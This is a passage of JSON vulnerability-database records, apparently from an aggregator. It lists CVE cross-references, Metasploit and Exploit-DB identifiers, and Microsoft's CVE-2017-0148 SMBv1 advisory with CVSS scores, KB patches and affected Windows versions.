"NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/product-tech", "reporter": "Anand Paturi", "references": [], "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2021-10-05T14:50:49", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:BD645B28-C99E-42EA-A606-832F4F534945"]}, {"type": "cve", "idList": ["CVE-2013-2551", "CVE-2021-26855", "CVE-2021-30116", "CVE-2017-0144", "CVE-2016-1019", "CVE-2017-0143", "CVE-2021-27065", "CVE-2015-8651", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-34527"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2016-1019", "UB:CVE-2015-8651"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2021-27065/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4"]}, {"type": "msrc", "idList": ["MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:239E65C8BEB88185329D9990C80B10DF"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-58570", "SMNTC-96705", "SMNTC-96704", "SMNTC-79705"]}, {"type": "hackerone", "idList": ["H1:1119228", "H1:1119224"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "cisa", "idList": ["CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:2B970469D89016F563E142BE209443D8", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:60700"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A"]}, {"type": "mssecure", "idList": ["MSSECURE:2FB5327A309898BD59A467446C9C36DC"]}, {"type": "exploitdb", "idList": ["EDB-ID:49895", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:49637", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162736", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:161938"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-36024", "1337DAY-ID-35944", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-36281"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "fireeye", "idList": ["FIREEYE:1A61A821CE69D378830204326B2E938C"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}], "modified": "2021-10-05T14:50:49", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-05T14:50:49", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-10-05T14:50:49", "differentElements": ["description"], "edition": 1}], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-0948", "CPAI-2021-0099", "CPAI-2015-1429", "CPAI-2014-0372", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2017-0177", "CPAI-2021-0465", "CPAI-2014-0371", "CPAI-2016-0264"]}, {"type": "githubexploit", "idList": ["7078ED42-959E-5242-BE9D-17F2F99C76A8", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "07DF268C-467E-54A3-B713-057BA19C72F7", "3F400483-1F7E-5BE5-8612-4D55D450D553", "63C36F7A-5F99-5A79-B99F-260360AC237F", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "0CFAB531-412C-57A0-BD9E-EF072620C078", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "D089579B-4420-5AD5-999F-45063D972E66", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "0BB19334-D311-5464-B40B-7B27A0AD8825", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "7758268F-2004-536A-B51F-62DA1E5A992D", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "0263BC36-BEB1-519B-965B-52D9E6AB116F", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "256984DC-A742-53F8-889F-2071EC134734", "20466D13-6C5B-5326-9C8B-160E9BE37195", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F5339382-9321-5B96-934D-B803353CC9E3", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "939F3BE7-AF69-5351-BD56-12412FA184C5", "E235B3DF-990F-5508-9496-90462B45125D", "3019C843-FE2F-527C-B7C1-14A1C3066721", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "7275794A-F2F6-51E6-B514-185E494D8A3F"]}, {"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:BD645B28-C99E-42EA-A606-832F4F534945"]}, {"type": "cve", "idList": ["CVE-2015-8651", "CVE-2017-0144", "CVE-2017-0143", "CVE-2021-34527", "CVE-2017-0145", "CVE-2021-30116", "CVE-2013-2551", "CVE-2021-26855", "CVE-2016-1019", "CVE-2021-27065", "CVE-2020-1472"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-8651", "UB:CVE-2016-1019", "UB:CVE-2020-1472"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27065/", "MSF:ILITIES/MSFT-CVE-2021-34527/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F"]}, {"type": "msrc", "idList": ["MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:239E65C8BEB88185329D9990C80B10DF"]}, {"type": "symantec", "idList": ["SMNTC-79705", "SMNTC-58570", "SMNTC-96703"]}, {"type": "hackerone", "idList": ["H1:1119228", "H1:1119224"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "cisa", "idList": ["CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:433F588AAEF2DF2A0B46FE60687F19E0"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45A121567763FF457DE6E50439C2605A"]}], "modified": "2021-10-05T16:35:26", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-10-05T16:35:26", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"]}], "mscve": [{"id": "MS:CVE-2017-0148", "hash": "7d21d22f517defccc35d772d05d77d29", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0148", "hash": "b1640362be726f1270f402ea7ef6a86c66aa5eae57b350fd9b739f1b6c5ad735", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2019-08-09T00:43:59", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"modified": "2019-08-09T00:43:59", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-08-09T00:43:59", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-09T00:43:59", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "8c4669cac4f8668129bde1efde0f0096", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2020-08-07T11:45:29", "history": [], "viewCount": 80, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-08-07T11:45:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-08-07T11:45:29", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:45:29", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "dde6aece2d6fc96ddca1cf6b2ba5069a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4012598", 